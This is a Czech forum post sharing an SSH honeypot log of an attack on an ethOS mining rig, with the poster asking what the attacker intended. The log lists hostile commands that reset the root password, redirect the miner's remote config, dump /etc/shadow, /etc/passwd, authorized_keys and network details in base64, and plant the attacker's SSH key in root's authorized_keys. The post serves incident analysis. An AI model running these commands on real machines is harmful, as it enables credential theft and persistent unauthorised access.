Čas od času si prohlížim log z SSH honeypotu a většinou jsou to celkem nezajímave pokusy Ale včera se mi tam objevila celkem sofistikovaná záležitost:
$ echo https://configmaker.com/my/SilverUnluckyLonelyHagfish.txt > /home/ethos/remote.conf Přijato 6. 11. 2017 19:21:46
$ sudo -n usermod /root/-p /81sG1WACcZgzPn8A0Wn58hHXWqy5yOgTlYJEbOjhkHD0MRsAkfJgjU/ioCYDeR1 root Přijato 6. 11. 2017 19:21:46
$ echo '</cmd7iptables>' Přijato 6. 11. 2017 19:21:46
$ sudo -n iptables -t nat -S | gzip | base64 Zamítnuto 6. 11. 2017 19:21:46
$ sudo -n iptables -S | gzip | base64 Zamítnuto 6. 11. 2017 19:21:46
$ echo '</cmd7sgminerconf><cmd7iptables>' Přijato 6. 11. 2017 19:21:46
$ cat /var/run/ethos/sgminer.conf | gzip | base64 Zamítnuto 6. 11. 2017 19:21:46
$ echo '</cmd7claymorezstub><cmd7sgminerconf>' Přijato 6. 11. 2017 19:21:46
$ cat /home/ethos/claymore-zcash.stub.conf | gzip | base64 Zamítnuto 6. 11. 2017 19:21:46
$ echo '</cmd7claymorestub><cmd7claymorezstub>' Přijato 6. 11. 2017 19:21:46
$ cat /home/ethos/claymore.stub.conf | gzip | base64 Zamítnuto 6. 11. 2017 19:21:46
$ echo '</cmd7rclocal><cmd7claymorestub>' Přijato 6. 11. 2017 19:21:46
$ cat /etc/rc.local | gzip | base64 Zamítnuto 6. 11. 2017 19:21:46
$ echo '</cmd7remoteconf><cmd7rclocal>' Přijato 6. 11. 2017 19:21:46
$ cat /home/ethos/remote.conf | gzip | base64 Zamítnuto 6. 11. 2017 19:21:46
$ echo '</cmd7localconf><cmd7remoteconf>' Přijato 6. 11. 2017 19:21:46
$ cat /home/ethos/local.conf | gzip | base64 Zamítnuto 6. 11. 2017 19:21:46
$ echo '</cmd7ifconfig><cmd7localconf>' Přijato 6. 11. 2017 19:21:46
$ /sbin/ifconfig | gzip | base64 Zamítnuto 6. 11. 2017 19:21:46
$ echo '</cmd7arpan><cmd7ifconfig>' Přijato 6. 11. 2017 19:21:46
$ /usr/sbin/arp -an | gzip | base64 Zamítnuto 6. 11. 2017 19:21:46
$ echo '</cmd7netstat><cmd7arpan>' Přijato 6. 11. 2017 19:21:46
$ netstat -npta | gzip | base64 Zamítnuto 6. 11. 2017 19:21:46
$ echo '</cmd7psfaux><cmd7netstat>' Přijato 6. 11. 2017 19:21:46
$ ps -faux | gzip | base64 Zamítnuto 6. 11. 2017 19:21:46
$ echo '</cmd7shadow><cmd7psfaux>' Přijato 6. 11. 2017 19:21:46
$ sudo -n cat /etc/shadow | gzip | base64 Zamítnuto 6. 11. 2017 19:21:46
$ echo '</cmd7passwd><cmd7shadow>' Přijato 6. 11. 2017 19:21:46
$ cat /etc/passwd | gzip | base64 Zamítnuto 6. 11. 2017 19:21:46
$ echo '</cmd7lshome><cmd7passwd>' Přijato 6. 11. 2017 19:21:46
$ ls -la /home | gzip | base64 Zamítnuto 6. 11. 2017 19:21:46
$ echo '</cmd7authkey><cmd7lshome>' Přijato 6. 11. 2017 19:21:46
$ cat /root/.ssh//authorized_keys | gzip | base64 Zamítnuto 6. 11. 2017 19:21:46
$ echo '</cmd7lastlog><cmd7authkey>' Přijato 6. 11. 2017 19:21:46
$ lastlog | gzip | base64 Zamítnuto 6. 11. 2017 19:21:46
$ echo '</cmd7last><cmd7lastlog>' Přijato 6. 11. 2017 19:21:46
$ last | gzip | base64 Zamítnuto 6. 11. 2017 19:21:46
$ echo '</cmd7who><cmd7last>' Přijato 6. 11. 2017 19:21:46
$ who | gzip | base64 Zamítnuto 6. 11. 2017 19:21:46
$ echo '</cmd7w><cmd7who>' Přijato 6. 11. 2017 19:21:46
$ w | gzip | base64 Zamítnuto 6. 11. 2017 19:21:46
$ echo '</cmd7uptime><cmd7w>' Přijato 6. 11. 2017 19:21:46
$ uptime | gzip | base64 Zamítnuto 6. 11. 2017 19:21:46
$ echo '</cmd7uname><cmd7uptime>' Přijato 6. 11. 2017 19:21:46
$ uname -a | gzip | base64 Zamítnuto 6. 11. 2017 19:21:46
$ echo '<cmd7uname>' Přijato 6. 11. 2017 19:21:46
$ echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC6apTpBLxylca9D2EVjfr8xa6OadS2c0oR4RYLkJiIp2XoWkJKqxVodz0s2gfQrMb9qr3oJQVoT4M1WHd829D5Wu2kJY4RMFSo+Rb2dszg0PQJ5Ug1pEW1DedYR379sjoIiF/qbaDzq3FtkUx9+5E/BiqdMGyncml3yinN6HuNH+Fnhv6TtS45Re6gI1rA21qFguBF5U3yPFKeF5ElH997x/0rf3Qr01v38F2994IEXZ3fiaZTkw7k/ul9CnuCuIlCkPGeO7xkpR/70sU077scxbArlCe/ch5BSBK9u8nOCBUBV7AlgZ9RojfTp/wbqqg20zfB7pwEaaMI25zP5QsF Přijato 6. 11. 2017 19:21:46
$ sudo echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC6apTpBLxylca9D2EVjfr8xa6OadS2c0oR4RYLkJiIp2XoWkJKqxVodz0s2gfQrMb9qr3oJQVoT4M1WHd829D5Wu2kJY4RMFSo+Rb2dszg0PQJ5Ug1pEW1DedYR379sjoIiF/qbaDzq3FtkUx9+5E/BiqdMGyncml3yinN6HuNH+Fnhv6TtS45Re6gI1rA21qFguBF5U3yPFKeF5ElH997x/0rf3Qr01v38F2994IEXZ3fiaZTkw7k/ul9CnuCuIlCkPGeO7xkpR/70sU077scxbArlCe/ch5BSBK9u8nOCBUBV7AlgZ9RojfTp/wbqqg20zfB7pwEaaMI25zP5QsF > /root/.ssh/authorized_keys Přijato 6. 11. 2017 19:21:46
$ echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC6apTpBLxylca9D2EVjfr8xa6OadS2c0oR4RYLkJiIp2XoWkJKqxVodz0s2gfQrMb9qr3oJQVoT4M1WHd829D5Wu2kJY4RMFSo+Rb2dszg0PQJ5Ug1pEW1DedYR379sjoIiF/qbaDzq3FtkUx9+5E/BiqdMGyncml3yinN6HuNH+Fnhv6TtS45Re6gI1rA21qFguBF5U3yPFKeF5ElH997x/0rf3Qr01v38F2994IEXZ3fiaZTkw7k/ul9CnuCuIlCkPGeO7xkpR/70sU077scxbArlCe/ch5BSBK9u8nOCBUBV7AlgZ9RojfTp/wbqqg20zfB7pwEaaMI25zP5QsF > /root/.ssh//authorized_keys Přijato 6. 11. 2017 19:21:46
$ mkdir -p /root/.ssh
Tušíte někdo o co se (utočník) pokoušel? Já to od oka odhaduji na instalaci miningu ale kdo ví